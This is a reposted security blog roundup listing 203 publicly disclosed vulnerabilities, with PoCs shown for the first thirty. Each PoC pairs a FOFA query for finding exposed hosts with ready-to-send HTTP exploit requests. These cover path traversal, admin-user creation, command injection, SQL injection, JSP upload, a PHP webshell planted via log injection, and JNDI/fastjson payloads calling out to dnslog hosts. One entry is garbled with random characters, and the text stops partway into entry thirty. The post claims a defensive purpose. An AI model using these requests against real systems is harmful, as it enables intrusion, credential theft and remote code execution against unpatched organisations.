Roundup of publicly disclosed Internet vulnerabilities, 202309-202406 (repost)

Posted on 2024-6-5 14:31:29
Roundup of publicly disclosed Internet vulnerabilities, 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is reproduced from 网络安全新视界; author: 网络安全新视界

Purpose: exploitation of N-day vulnerabilities makes up a large share of the attacks seen in offensive/defensive exercises; we hope this article is of some help to defenders. Defensive teams can use its contents to check their own exposure.

Sources: the article covers 203 PoCs for high-severity vulnerabilities disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were collected and published by the 网络安全新视界 team.

Patches: all of the vulnerabilities are public; for patches or remediation, contact the product vendor.

Content: because of length limits, a few PoCs that were too long have been replaced with the word PAYLOAD; search for the complete PoC yourself if you need it.

Rights: if any content infringes the legitimate rights of any party, contact the 网络安全新视界 team through the account backend to have the relevant content removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list" gate. This article is already the most complete version; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Contents

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPtech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 one-face smart management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese Tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 S200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零 navigation page file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. Hongjing EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical browsing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS ocean video management system dmku SQL injection
201. 方正 (Founder) all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

PoC list

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Replace password with the MD5 of your own password
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging in to the admin backend with the default account admin, perform the following operation
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=第一步登录获取的cookie
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL-encoding of the following statement

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies first
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip


The csrf_cookie_jorani value from the response is used in the subsequent requests
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding


POST request, which plants the function; the command it runs is passed base64-encoded
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor


Send the following request to the target, which runs the id command; the value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= in the request header is the base64-encoded command string
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The PoC calls a function to compute the MD5 of 1234
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

: D  i( Y% h5 e( e9 |* `) ?; g0 k25. 用友NC registerServlet JNDI 远程代码执行
9 h% F3 L6 O( ~; n. S( x* u( eFOFA:app="用友-UFIDA-NC"! e1 E; I5 Z1 n
POST /portal/registerServlet HTTP/1.1
: ?( W% s& b- I0 H  v4 MHost: your-ip4 z0 e  y4 y+ Y8 l) ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
$ a9 H  w7 [& L% I. PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
7 z2 a: M6 _( p) a0 T3 g4 u# ZAccept-Encoding: gzip, deflate6 p' c* ]& f: R* Z. I
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.65 l+ m; q# M: p  D
Content-Type: application/x-www-form-urlencoded
! `5 ^* _  ~( m2 ]' c
' R9 M6 v7 y5 l! R& J) T- Z7 Xtype=1&dsname=ldap://dnslog! g: \, [9 H, L! I3 \( P/ }

, v1 b1 |; {5 P8 y8 Z
  s% T, {" }% F& y* G2 R- L( ]1 ?# O5 y3 i, t2 F* M7 i6 i) v, A
26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8


28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Uploaded file path:
/uapim/static/pages/nc/head.jsp


29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
